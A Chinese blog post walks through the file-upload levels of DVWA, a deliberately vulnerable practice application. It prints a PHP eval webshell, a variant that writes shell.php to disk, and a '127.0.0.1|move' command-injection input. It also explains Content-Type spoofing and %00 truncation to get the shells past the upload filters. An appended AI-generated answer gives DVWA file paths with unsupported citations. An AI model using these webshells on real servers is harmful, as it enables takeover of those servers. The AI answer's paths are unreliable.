DVWA篇_文件上传

已于 2023-05-31 18:37:28 修改
阅读量2.1k 收藏 8
点赞数
文章标签: web安全
于 2023-05-25 23:10:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/CQ17743254852/article/details/130876565
版权
文章详细介绍了如何利用不同级别的文件上传过滤漏洞,包括更改Content-Type、使用%00截断、命令执行和文件包含漏洞来获取服务器权限。在低级别中,可以直接上传.php文件;中级别可通过修改Content-Type或使用%00截断;高级别则需利用命令执行或文件包含漏洞将图片文件转为PHP文件以执行代码。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

准备工作:

Low

Medium 

方法一:更改Content-Type类型

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

High

方法一:使用命令执行漏洞将文件类型改为php

方法二: 使用文件包含漏洞

 总结:

准备工作:

1.一句话木马:

<?php @eval($_POST['pass']);?>

2.蚁剑

3.Burp Suite

Low

分析代码可知low级别没有进行任何过滤,我们可以直接上传.php文件

使用蚁剑连接 

Medium 

分析代码可知medium级别对content-type以及文件大小进行了过滤,要求为image/jpeg或image/png,我们可以使用Burp Suite抓包改content-type或使用%00进行文件截断(适用于5.3.4以下的php版本)

方法一:更改Content-Type类型

原类型为application/octet-stream,这里我们改为image/jpeg

成功上传后使用蚁剑连接 

方法二:针对文件后缀过滤可以使用%00截断(适用于5.3.4以下的php版本) 

将filename改为test.php.jpeg,再使用%00截断,并进行URL编码

 

这里的content-type因为是.jpeg文件,所以自动修改为image/jpeg了

 再使用蚁剑连接

High

分析代码可知high级别使用白名单的方式进行文件类型过滤,只能是jpg、jpeg、png类型,我们可以使用windows的copy命令来制作图片木马

上传成功

因为上传的是静态文件, 这个时候我们使用蚁剑是连接不了的。有两种方法,第一种是使用命令执行漏洞将文件类型改为php,第二种是使用文件包含漏洞去执行我们上传的文件,执行后会自动生成一个php文件。

方法一:使用命令执行漏洞将文件类型改为php

输入以下代码

127.0.0.1|move ../../hackable/uploads/shell.png ../../hackable/uploads/shell.php

将图片木马文件类型改为php文件类型,成功后会显示以下结果

这时候我们使用蚁剑进行连接

方法二: 使用文件包含漏洞

此方法需要将一句话改为

<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[pass])?>');?>

使木马有写功能 

先把security等级跳到low,然后复制刚刚上传的路径,之后利用文件执行漏洞去执行我们的图片木马文件。

可以看到文件执行成功

来到文件包含文件夹下,生成了shell.php文件

 

 使用蚁剑连接

 总结:

DVWA里的文件上传过滤可以抓包修改content-type,也可以使用%00截断,还使用copy命令制作图片木马,然后使用命令执行或者文件包含漏洞getshell

还可以使用前端JS绕过,.htaccess文件上传,竞争条件文件上传等方法

Catherines7
关注
DVWA】File Upload任意文件上传实战
善恶终有报,天道好轮回;不信抬头看,苍天饶过谁
11-27 1700
何必择地,何必择时,但问立志之真不真耳
DVWA文件上传
qq_62078839的博客
04-03 3791
LOW 直接上传小马,上传成功 使用phpinfo();验证小马的可用性 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILES[ 'uploaded' ][ 'na..
DVWA-File Upload(文件上传)
简简的博客
02-02 563
本系列文集:DVWA学习笔记 文件上传漏洞通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 ###Low: 函数介绍: basename()函数返回路径中的文件名部分。 string basename ( string $path [, string $suffix ] ) 参数介...
DVWA 文件上传
m0_56107268的博客
04-30 2152
Low File Upload Source vulnerabilities/upload/source/low.php <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; $target_path .= basename( $_FILE..
DVWA靶场-----FIle Upload(文件上传
m0_65712192的博客
11-14 4776
DVWA靶场-----FIle Upload(文件上传
DVWA文件上传(File Upload)
qq_39682037的博客
03-21 2718
文件上传(File Upload) Security Level: low 源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; ...
dvwa文件上传漏洞低级,中级,以及高级的难度测试(手把手教会你文件上传
qq_61426144的博客
07-18 1951
审计代码得知这里使用了白名单模式,除了jpg,JPG,jpeg,JPEG这几种类型除外,其它的一律不准上传,那我们直接配合文件包含漏洞包含我们的图片马直接getshell,制作图片马的过程小编这里就不展示了,各位小伙伴可以网上搜索图片马制作过程,这里高级难度我是用的是fofa上面搜索的DVWA的高级难度,因为我的靶机高级难度是写死了,在这里我们上传的图片马为1.jpg。最后利用菜刀工具直接链接该地址就行,后续小编也会更新文件包含的漏洞,文件上传漏洞可能有些地方讲的不是很好,还请大家多多指教。
DVWA-File Upload文件上传
mlws1900的博客
03-16 1121
黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA文件上传漏洞
m0_59448417的博客
10-10 557
通常在一些网站中都有文件上传的一个功能,比如上传头像或者背景之类的,这就是一个注入点。在这里我们可以上传webshell来达成一些目的。这里以DVWA里的靶场给大家做个解析。提示:以下是本文章正文内容,下面案例可供参考。
文件上传漏洞——DVWA练习
Lemon's blog
08-03 1566
前言:文件上传漏洞是很常见的漏洞,也非常有趣,接下来就在DVWA靶场中边学边练。 low级别 观察源码 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/upl...
Damn Vulnerable Web Application(DVWA)——文件上传漏洞
longanquan的博客
08-06 1247
文件上传漏洞简介 文件上传web应用不可或缺的功能之一。如果服务器配置不当或者没有进行足够的过滤,web用户就可以上传任意文件,包括恶意脚本文件等,这就造成了文件上传漏洞。 环境简绍 Windows7模拟客户机(攻击者,有恶意代码文件,有菜刀工具) Window server 2008模拟服务器(搭建DVWA) LOW难度 在win7上访问DVWA 我们直接将做好的一句话木马进行上传 一句话木马为.php文件,文件内容为: <?php @eval($_POST['pass']);?> 然后
DVWA-文件上传(File Upload)
weixin_58954236的博客
08-20 1582
指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
DVWA】——File Upload(文件上传
HinsCoder的博客
09-15 1333
文件上传漏洞是由于对上传文件未作过滤或过滤机制不严(文件后缀或类型),导致恶意用户可以上传脚本文件,通过上传文件可达到控制网站权限的目的。
DVWA-文件上传upload
Cwillchris的博客
10-28 2245
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、Low级 1、查看源码及分析 <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be writing to? //文件的目标路径hackable/uploads/,也就是文件上传的位置 $target_path = DVWA_WEB
DVWA靶场系列(四)—— File Upload(文件上传
qq_45612828的博客
07-12 6202
DVWA靶场系列(四)—— File Upload(文件上传
5、DVWA——文件上传
qq_55202378的博客
09-11 1452
DVWA 文件上传
DVWA 之 File Upload(文件上传
RexHa的博客
10-02 2914
文件上传原理: 黑客利用文件上传后服务器解析处理文件的漏洞上传一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。
DVWA---文件上传
孤的博客
11-20 891
File Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的。 网页能够上传文件的条件 表单提交方式:post (get方式提交有大小限制,post没有) 表单的enctype属性:必须设置为multipart/form-data 表单必须有文件上传项:fi...
dvwa靶场中文件上传漏洞前端文件路径是什么
最新发布
03-12
<think>好的,用户的问题是关于DVWA靶场中文件上传漏洞的前端文件路径。我需要先理解用户的具体需求是什么。DVWA(Damn Vulnerable Web Application)是一个用于安全测试的练习平台,用户可能在进行漏洞测试或学习时需要找到相关的文件路径,以便分析前端代码或进行调试。 首先,根据提供的引用资料,特别是引用[3]中的例子,用户访问file1.php时,路径显示为http://172.20.10.5/vulnerabilities/fi/?page=file1.php。这表明文件上传漏洞的模块可能位于vulnerabilities目录下的某个子目录中,比如fi可能对应文件包含漏洞,但用户问的是文件上传漏洞,可能需要确认正确的路径结构。 接下来,查看引用[1]和[4],它们提到DVWA文件上传漏洞处理逻辑,如服务器未对文件类型进行检查,导致可以上传恶意文件。通常,DVWA的不同漏洞类型有不同的路径,例如文件上传可能对应的是upload.php或其他类似文件。但用户需要的是前端文件的路径,也就是在服务器上存放这些前端页面的具体位置。 考虑到DVWA的安装结构,通常其前端文件位于服务器的web目录下,比如在Linux系统中可能是/var/www/html/dvwa/,而具体的漏洞模块可能位于子目录中,如vulnerabilities/upload/。需要确认具体的目录结构,例如: - 文件上传漏洞的前端页面可能位于dvwa/vulnerabilities/upload/index.php - 处理上传的PHP脚本可能在dvwa/vulnerabilities/upload/upload.php 另外,引用[4]提到上传后的提示路径,说明上传后的文件可能存储在服务器的一个特定目录,如dvwa/hackable/uploads/。用户可能需要知道这个上传目录的路径来检查上传的文件。 需要验证这些路径是否正确。例如,在DVWA中,文件上传漏洞的界面通常通过访问http://localhost/dvwa/vulnerabilities/upload/来进入,对应的服务器文件路径应为安装目录下的vulnerabilities/upload/中的文件。 此外,用户可能希望修改前端代码或查看前端验证逻辑,因此需要找到对应的前端文件。例如,前端验证可能通过JavaScript实现,位于dvwa/vulnerabilities/upload/目录下的某个.js文件或嵌入在HTML/PHP中。 总结可能的路径: 1. 前端页面:/dvwa/vulnerabilities/upload/index.php 2. 处理上传的脚本:/dvwa/vulnerabilities/upload/upload.php 3. 上传文件存储目录:/dvwa/hackable/uploads/ 需要提醒用户,实际路径可能因安装配置不同而有所变化,建议检查DVWA的配置文件或服务器目录结构。同时,修改这些文件需要权限,并注意安全风险。</think>在DVWA靶场中,文件上传漏洞的前端文件路径主要涉及以下关键位置: 1. **前端页面路径** - 文件上传功能的前端界面通常位于: $$/dvwa/vulnerabilities/upload/index.php$$ 该文件负责渲染上传表单界面,但实际漏洞可能存在于服务端验证逻辑中[^4]。 2. **文件上传处理脚本** - 上传请求由服务端脚本处理,路径可能为: $$/dvwa/vulnerabilities/upload/upload.php$$ 此脚本未对文件类型、内容进行有效过滤,导致漏洞存在[^1]。 3. **文件存储目录** - 成功上传的文件默认保存在: $$/dvwa/hackable/uploads/$$ 可通过前端提示的路径(如`http://.../hackable/uploads/文件名`)访问已上传文件[^4]。 --- ### 验证方法 1. **查看源码** 通过浏览器开发者工具检查表单的`action`属性,例如: ```html <form enctype="multipart/form-data" action="upload.php" method="POST"> ``` 可确认处理脚本为当前目录下的`upload.php`[^2]。 2. **服务器目录结构** DVWA标准安装中,漏洞模块统一存放在`vulnerabilities/`子目录下,例如: $$/var/www/html/dvwa/vulnerabilities/upload/$$ 包含前端页面、处理脚本和配置文件[^3]。 --- ### 注意事项 - **配置差异**:实际路径可能因安装方式(如XAMPP、Docker)不同而变化,建议通过`config.inc.php`确认根目录。 - **安全风险**:直接修改这些文件可能影响靶场稳定性,操作前建议备份[^1]。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值